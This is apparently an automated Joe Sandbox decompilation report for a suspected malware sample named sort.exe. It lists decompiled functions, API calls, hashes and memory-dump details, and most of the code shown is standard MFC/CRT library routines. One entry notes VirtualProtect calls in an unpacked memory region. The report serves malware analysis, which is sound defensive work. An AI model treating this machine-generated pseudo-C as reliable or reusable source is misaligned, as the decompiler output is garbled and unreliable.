                                            • Opcode Fuzzy Hash: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
                                            • Instruction Fuzzy Hash: CE018B31A00219EFDF21AB94DC09EAEBBB9FF08300F44446DF552A2160D730AA10DB48
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 38%
                                            			E00423946(intOrPtr* __eax, void* __ebx, struct tagRECT* _a5, intOrPtr _a9) {
                                            				int _t13;
                                            				int _t14;
                                            				void* _t18;
                                            				signed int _t20;
                                            				struct tagRECT* _t24;
                                            
                                            				asm("pushfd");
                                            				 *__eax =  *__eax + __eax;
                                            				if( *__eax == 0) {
                                            					_t20 = E00416528(_t18);
                                            					if((_t20 & 0x00040600) == 0) {
                                            						_push(GetSystemMetrics(6));
                                            						_push(5);
                                            					} else {
                                            						_push(GetSystemMetrics(0x21));
                                            						_push(0x20);
                                            					}
                                            					_t13 = GetSystemMetrics();
                                            					_t24 = _a5;
                                            					_t14 = InflateRect(_t24, _t13, ??);
                                            					if((_t20 & 0x00c00000) != 0) {
                                            						_t14 =  *0x439c9c; // 0x0
                                            						_t24->top = _t24->top - _t14;
                                            					}
                                            				} else {
                                            					_t14 = E00415361(_t18, _a5, _a9);
                                            				}
                                            				return _t14;
                                            			}









                                            APIs
                                            • GetSystemMetrics.USER32 ref: 00423975
                                            • GetSystemMetrics.USER32 ref: 00423989
                                            • InflateRect.USER32(?,00000000), ref: 00423991
                                              • Part of subcall function 00415361: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 00415382
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MetricsRectSystem$AdjustInflateWindow
                                            • String ID:
                                            • API String ID: 4080371637-0
                                            • Opcode ID: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
                                            • Instruction ID: 476433383503efba52e9924e6e49c42754f463986d7ec7af0d6b2631c1f39b91
                                            • Opcode Fuzzy Hash: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
                                            • Instruction Fuzzy Hash: 6FF0F672644320BFD2115B94BC04B6B7F74DF82721F46401BB94857250C6AC9D91CB9B
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 37%
                                            			E00422D9C(struct tagRECT* _a8) {
                                            				signed int _t11;
                                            				int _t13;
                                            				intOrPtr _t14;
                                            				void* _t18;
                                            				signed int _t20;
                                            				struct tagRECT* _t23;
                                            
                                            				if( *0x439c44 != 0) {
                                            					return E004136A7(_t18);
                                            				}
                                            				_t20 = E00416528(_t18);
                                            				if((_t20 & 0x00040600) == 0) {
                                            					_push( ~(GetSystemMetrics(6)));
                                            					_push(5);
                                            				} else {
                                            					_push( ~(GetSystemMetrics(0x21)));
                                            					_push(0x20);
                                            				}
                                            				_t11 = GetSystemMetrics();
                                            				_t23 = _a8;
                                            				_t13 = InflateRect(_t23,  ~_t11, ??);
                                            				if((_t20 & 0x00c00000) != 0) {
                                            					_t14 =  *0x439c9c; // 0x0
                                            					_t23->top = _t23->top + _t14;
                                            					return _t14;
                                            				}
                                            				return _t13;
                                            			}










                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$InflateRect
                                            • String ID:
                                            • API String ID: 437325472-0
                                            • Opcode ID: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
                                            • Instruction ID: 4fb92264d37d23bc1c26475d3dc17a881ebb7d940131a89487b38c95dcd350b0
                                            • Opcode Fuzzy Hash: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
                                            • Instruction Fuzzy Hash: DBF02E32740334BFE221ABA4BD00B7B3355DF40B14F56002BF909A7284CBE86C418BAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A843(struct HWND__* _a4, CHAR* _a8) {
                                            				char _v260;
                                            				int _t14;
                                            				int _t15;
                                            
                                            				_t15 = lstrlenA(_a8);
                                            				if(_t15 > 0x100 || GetWindowTextA(_a4,  &_v260, 0x100) != _t15) {
                                            					L3:
                                            					return SetWindowTextA(_a4, _a8);
                                            				}
                                            				_t14 = lstrcmpA( &_v260, _a8);
                                            				if(_t14 != 0) {
                                            					goto L3;
                                            				}
                                            				return _t14;
                                            			}







                                            APIs
                                            • lstrlenA.KERNEL32(?,00000800), ref: 0041A850
                                            • GetWindowTextA.USER32 ref: 0041A86C
                                            • lstrcmpA.KERNEL32(?,?), ref: 0041A880
                                            • SetWindowTextA.USER32(00000104,?), ref: 0041A890
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: TextWindow$lstrcmplstrlen
                                            • String ID:
                                            • API String ID: 330964273-0
                                            • Opcode ID: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
                                            • Instruction ID: c3fc7a8564519c1884d43f76098dd6529aba3a828980642d919d20382e6303d7
                                            • Opcode Fuzzy Hash: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
                                            • Instruction Fuzzy Hash: FFF05831600018ABCF32AF24DC08ADEBB6CFB18391F048172FC5AD1160D775CAA6CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00420031(void* __ecx, void* __eflags) {
                                            				signed int _t9;
                                            				int _t10;
                                            				void* _t12;
                                            				void* _t13;
                                            				signed int* _t14;
                                            				void* _t15;
                                            
                                            				_t13 = __ecx;
                                            				E0042007A(__ecx, __eflags, 1);
                                            				ReleaseCapture();
                                            				_t12 = E00413740(_t15, GetDesktopWindow());
                                            				LockWindowUpdate(0);
                                            				_t9 =  *(_t13 + 0x84);
                                            				_t14 = _t13 + 0x84;
                                            				if(_t9 != 0) {
                                            					_t10 = ReleaseDC( *(_t12 + 0x1c),  *(_t9 + 4));
                                            					 *_t14 =  *_t14 & 0x00000000;
                                            					return _t10;
                                            				}
                                            				return _t9;
                                            			}










                                            APIs
                                              • Part of subcall function 0042007A: GetStockObject.GDI32(00000000), ref: 00420090
                                              • Part of subcall function 0042007A: InflateRect.USER32(?,000000FF,000000FF), ref: 00420134
                                            • ReleaseCapture.USER32(00000001,745EA0A0,?,00420430,00000000), ref: 0042003C
                                            • GetDesktopWindow.USER32 ref: 00420042
                                            • LockWindowUpdate.USER32(00000000,00000000,?,00420430,00000000), ref: 00420052
                                            • ReleaseDC.USER32 ref: 0042006E
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                            • String ID:
                                            • API String ID: 1260764132-0
                                            • Opcode ID: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
                                            • Instruction ID: aa72cfc852c6b525c97a93d2fef73d5ebb0a3ecfc5ad3a3ec9de28fd496f1bdc
                                            • Opcode Fuzzy Hash: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
                                            • Instruction Fuzzy Hash: D0E0D8313003119BE7206B71FC0DB557BA4FF40791F494035F944C61B1CB78A842CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E00406D64(void* __ebx, void* __edi) {
                                            				char _v17;
                                            				signed char _v18;
                                            				struct _cpinfo _v24;
                                            				char _v280;
                                            				char _v536;
                                            				char _v792;
                                            				char _v1304;
                                            				void* _t43;
                                            				char _t44;
                                            				signed char _t45;
                                            				void* _t55;
                                            				signed int _t56;
                                            				signed char _t64;
                                            				intOrPtr* _t66;
                                            				signed int _t68;
                                            				signed int _t70;
                                            				signed int _t71;
                                            				signed char _t76;
                                            				signed char _t77;
                                            				signed char* _t78;
                                            				void* _t81;
                                            				void* _t87;
                                            				void* _t88;
                                            
                                            				if(GetCPInfo( *0x43b640,  &_v24) == 1) {
                                            					_t44 = 0;
                                            					do {
                                            						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
                                            						_t44 = _t44 + 1;
                                            					} while (_t44 < 0x100);
                                            					_t45 = _v18;
                                            					_v280 = 0x20;
                                            					if(_t45 == 0) {
                                            						L9:
                                            						E0040A040(1,  &_v280, 0x100,  &_v1304,  *0x43b640,  *0x43b864, 0);
                                            						E00409DEA( *0x43b864, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x43b640, 0);
                                            						E00409DEA( *0x43b864, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x43b640, 0);
                                            						_t55 = 0;
                                            						_t66 =  &_v1304;
                                            						do {
                                            							_t76 =  *_t66;
                                            							if((_t76 & 0x00000001) == 0) {
                                            								if((_t76 & 0x00000002) == 0) {
                                            									 *(_t55 + 0x43b660) =  *(_t55 + 0x43b660) & 0x00000000;
                                            									goto L16;
                                            								}
                                            								 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000020;
                                            								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
                                            								L12:
                                            								 *(_t55 + 0x43b660) = _t77;
                                            								goto L16;
                                            							}
                                            							 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000010;
                                            							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
                                            							goto L12;
                                            							L16:
                                            							_t55 = _t55 + 1;
                                            							_t66 = _t66 + 2;
                                            						} while (_t55 < 0x100);
                                            						return _t55;
                                            					}
                                            					_t78 =  &_v17;
                                            					do {
                                            						_t68 =  *_t78 & 0x000000ff;
                                            						_t56 = _t45 & 0x000000ff;
                                            						if(_t56 <= _t68) {
                                            							_t81 = _t87 + _t56 - 0x114;
                                            							_t70 = _t68 - _t56 + 1;
                                            							_t71 = _t70 >> 2;
                                            							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
                                            							_t88 = _t88 + 0x18;
                                            						}
                                            						_t78 =  &(_t78[2]);
                                            						_t45 =  *((intOrPtr*)(_t78 - 1));
                                            					} while (_t45 != 0);
                                            					goto L9;
                                            				}
                                            				_t43 = 0;
                                            				do {
                                            					if(_t43 < 0x41 || _t43 > 0x5a) {
                                            						if(_t43 < 0x61 || _t43 > 0x7a) {
                                            							 *(_t43 + 0x43b660) =  *(_t43 + 0x43b660) & 0x00000000;
                                            						} else {
                                            							 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000020;
                                            							_t64 = _t43 - 0x20;
                                            							goto L22;
                                            						}
                                            					} else {
                                            						 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000010;
                                            						_t64 = _t43 + 0x20;
                                            						L22:
                                            						 *(_t43 + 0x43b660) = _t64;
                                            					}
                                            					_t43 = _t43 + 1;
                                            				} while (_t43 < 0x100);
                                            				return _t43;
                                            			}



























                                            APIs
                                            • GetCPInfo.KERNEL32(?,00000000), ref: 00406D78
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Info
                                            • String ID: $
                                            • API String ID: 1807457897-3032137957
                                            • Opcode ID: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
                                            • Instruction ID: 0991ebd0fa5129877e21a5118ab4003fa57d8a1e05bbe212390e33009e0f709d
                                            • Opcode Fuzzy Hash: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
                                            • Instruction Fuzzy Hash: 6B4137311042AC5AEB119B14CD4ABEB3B99DB12704F1914F6D28AE61E3C3394964C7EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E00414354(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                            				struct _WNDCLASSA _v44;
                                            				void* __ebp;
                                            				void* _t27;
                                            				void* _t36;
                                            				intOrPtr _t40;
                                            				struct HINSTANCE__* _t46;
                                            				CHAR* _t50;
                                            
                                            				E00425FC6(1);
                                            				E004067EC(0, 0);
                                            				_push(0);
                                            				_t50 = E004249C4() + 0x58;
                                            				_t27 = E00424BFB();
                                            				_t40 = _a8;
                                            				_t46 =  *(_t27 + 8);
                                            				if(_t40 != 0 || _a12 != _t40 || _a16 != _t40) {
                                            					wsprintfA(_t50, "Afx:%x:%x:%x:%x:%x", _t46, _a4, _t40, _a12, _a16);
                                            				} else {
                                            					wsprintfA(_t50, "Afx:%x:%x", _t46, _a4);
                                            				}
                                            				if(GetClassInfoA(_t46, _t50,  &_v44) == 0) {
                                            					_v44.style = _a4;
                                            					_v44.lpfnWndProc = DefWindowProcA;
                                            					_v44.cbWndExtra = 0;
                                            					_v44.cbClsExtra = 0;
                                            					_v44.lpszMenuName = 0;
                                            					_v44.hIcon = _a16;
                                            					_push( &_v44);
                                            					_v44.hInstance = _t46;
                                            					_v44.hCursor = _t40;
                                            					_v44.hbrBackground = _a12;
                                            					_v44.lpszClassName = _t50;
                                            					_t36 = E004142C3();
                                            					_t65 = _t36;
                                            					if(_t36 == 0) {
                                            						E0041A6C8(_t65);
                                            					}
                                            				}
                                            				return _t50;
                                            			}











                                            APIs
                                              • Part of subcall function 00425FC6: LeaveCriticalSection.KERNEL32(?,00425D5F,00000010,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425FDE
                                              • Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A
                                            • wsprintfA.USER32 ref: 0041439A
                                            • wsprintfA.USER32 ref: 004143B6
                                            • GetClassInfoA.USER32 ref: 004143C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: wsprintf$ClassCriticalExceptionInfoLeaveRaiseSection
                                            • String ID: Afx:%x:%x
                                            • API String ID: 2529146597-2071556601
                                            • Opcode ID: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
                                            • Instruction ID: 12ef8f29c3e1d770b63201246022492823754bba1a77f7a68e39ab1c72f0dc03
                                            • Opcode Fuzzy Hash: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
                                            • Instruction Fuzzy Hash: 99113370B002199FDB10EFA5D8819DF7BB8EF48354B54402BF914E3241E3789A918BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02242468
                                            • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 022424B2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2241000_sort.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID: @
                                            • API String ID: 544645111-2766056989
                                            • Opcode ID: 839606eb055d731431a6a737fc42085fb5568c9959f9e7d7939c70df2301a622
                                            • Instruction ID: 411086ac21d9d8bbf948621cbd88d2c9ddd44c86da8dcea3a3a6c35fd5bfd71a
                                            • Opcode Fuzzy Hash: 839606eb055d731431a6a737fc42085fb5568c9959f9e7d7939c70df2301a622
                                            • Instruction Fuzzy Hash: 8A21D8B4D10209EFDB18CFD5C984BAEBBB5FF44304F608699E905AB244CB74AA40DB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E004092BC() {
                                            				signed int _v8;
                                            				char _v12;
                                            				CHAR* _t14;
                                            				intOrPtr _t27;
                                            				CHAR* _t37;
                                            				intOrPtr _t41;
                                            				intOrPtr _t46;
                                            
                                            				_push(_t33);
                                            				_t46 =  *0x43b86c; // 0x1
                                            				if(_t46 == 0) {
                                            					E00406EE9();
                                            				}
                                            				GetModuleFileNameA(0, 0x439dd0, 0x104);
                                            				_t14 =  *0x43b87c; // 0x4b3360
                                            				 *0x439d24 = 0x439dd0;
                                            				_t37 = 0x439dd0;
                                            				if( *_t14 != 0) {
                                            					_t37 = _t14;
                                            				}
                                            				E00409355(_t37, 0, 0,  &_v8,  &_v12);
                                            				_t41 = E00405667(_v12 + _v8 * 4);
                                            				if(_t41 == 0) {
                                            					E00406490(8);
                                            				}
                                            				E00409355(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
                                            				_t27 = _v8 - 1;
                                            				 *0x439d0c = _t41;
                                            				 *0x439d08 = _t27;
                                            				return _t27;
                                            			}











                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\setupugc\sort.exe,00000104,?,00000000,?,?,?,?,00406428), ref: 004092DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: FileModuleName
                                            • String ID: C:\Windows\SysWOW64\setupugc\sort.exe$`3K
                                            • API String ID: 514040917-1816137438
                                            • Opcode ID: 0f5333ee8a2dff6588455ba644662dd6d7049445c33136eb525253b45858dde5
                                            • Instruction ID: 4b94aae2b44b8e024f3e9ff9f5f305e43beb143c307f02a5dedadab18630ac66
                                            • Opcode Fuzzy Hash: 0f5333ee8a2dff6588455ba644662dd6d7049445c33136eb525253b45858dde5
                                            • Instruction Fuzzy Hash: DB1151B2900108BFD711EF95DC81CDF77ACDB49758B0500BBF905A3281D674AE00CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0040E0CD(intOrPtr __ecx) {
                                            				void* _t30;
                                            				void* _t33;
                                            
                                            				E00406520(E0042AD9C, _t30);
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
                                            				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
                                            				E0040F44C(__ecx, _t33, _t30 - 0x10);
                                            				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                            				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
                                            				E00401AE0(__ecx + 0xc, 0);
                                            				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
                                            				 *((intOrPtr*)(__ecx)) = 0x42f884;
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                            				return __ecx;
                                            			}






                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: (B$string too long
                                            • API String ID: 3519838083-213930478
                                            • Opcode ID: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
                                            • Instruction ID: 0881663991a763b1776dc7e615562ac6718b0cdd44e68c2937c70cca8b3e00b0
                                            • Opcode Fuzzy Hash: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
                                            • Instruction Fuzzy Hash: 37F0C272700255AFCB14DB45DC41BAEF7B8EB84344F40403FF501A7281C7B86908C7A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E0040E516(intOrPtr __ecx, void* __eflags) {
                                            				void* _t30;
                                            
                                            				E00406520(E0042AE28, _t30);
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
                                            				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
                                            				E0040F44C(__ecx, __eflags, _t30 - 0x10);
                                            				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                            				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
                                            				E00401AE0(__ecx + 0xc, 0);
                                            				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
                                            				 *((intOrPtr*)(__ecx)) = 0x42f908;
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
                                            				return __ecx;
                                            			}





                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: (B$ios::failbit set
                                            • API String ID: 3519838083-3284000329
                                            • Opcode ID: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
                                            • Instruction ID: 4fe0a7923be2234898ba92f5c38d2ffc42e0a3632a550d53740f74c2571e9ed9
                                            • Opcode Fuzzy Hash: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
                                            • Instruction Fuzzy Hash: 51F06272701215AFD7149B55D841BAEBBB8EB85744F40443FF511B7281C7B8690887A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E00404EAA(char _a4, signed int _a8) {
                                            				intOrPtr* _t18;
                                            
                                            				if(E00404DD2() == 0) {
                                            					if((_a8 & 0x00000003) != 0) {
                                            						L8:
                                            						return 0x12340042;
                                            					}
                                            					_t6 =  &_a4; // 0x404f63
                                            					_t18 =  *_t6;
                                            					if( *((intOrPtr*)(_t18 + 8)) <= 0 ||  *((intOrPtr*)(_t18 + 0xc)) <= 0 ||  *_t18 >= GetSystemMetrics(0) ||  *((intOrPtr*)(_t18 + 4)) >= GetSystemMetrics(1)) {
                                            						return 0;
                                            					} else {
                                            						goto L8;
                                            					}
                                            				}
                                            				return  *0x439610(_a4, _a8);
                                            			}





                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MetricsSystem
                                            • String ID: cO@
                                            • API String ID: 4116985748-3035479601
                                            • Opcode ID: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
                                            • Instruction ID: ce698e49c9a3c3113b24397bbaff0b3bfb960c4a55519e17048666b9bd17cfe1
                                            • Opcode Fuzzy Hash: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
                                            • Instruction Fuzzy Hash: 6AF03071104352DBC7219A35D804527B7D0BBC4355F008C7EE795A65D1D738D882EBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 81%
                                            			E0040E073(void* __eflags) {
                                            				intOrPtr* _t42;
                                            				intOrPtr* _t52;
                                            				void* _t54;
                                            				signed int _t60;
                                            
                                            				E00406520(E0042AD88, _t54);
                                            				 *((char*)(_t54 - 0x20)) =  *((intOrPtr*)(_t54 - 0xd));
                                            				E00401AE0(_t54 - 0x20, 0);
                                            				E00401B90(_t54 - 0x20, "string too long", E00405A40("string too long"));
                                            				_t5 = _t54 - 4;
                                            				 *_t5 =  *(_t54 - 4) & 0x00000000;
                                            				_t60 =  *_t5;
                                            				_push(_t54 - 0x20);
                                            				_t42 = _t54 - 0x3c;
                                            				L1();
                                            				 *((intOrPtr*)(_t54 - 0x3c)) = 0x42f864;
                                            				E004067EC(_t54 - 0x3c, 0x4336b8);
                                            				_pop(_t51);
                                            				E00406520(E0042AD9C, _t54);
                                            				_push(_t42);
                                            				_push(_t42);
                                            				_t52 = _t42;
                                            				 *((intOrPtr*)(_t54 - 0x14)) = _t52;
                                            				 *((intOrPtr*)(_t54 - 0x10)) = 0x42e428;
                                            				E0040F44C(_t42, _t60, _t54 - 0x10);
                                            				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
                                            				 *((char*)(_t52 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8))));
                                            				E00401AE0(_t52 + 0xc, 0);
                                            				E00402320(_t52 + 0xc,  *((intOrPtr*)(_t54 + 8)), 0,  *0x42b7d8);
                                            				 *_t52 = 0x42f884;
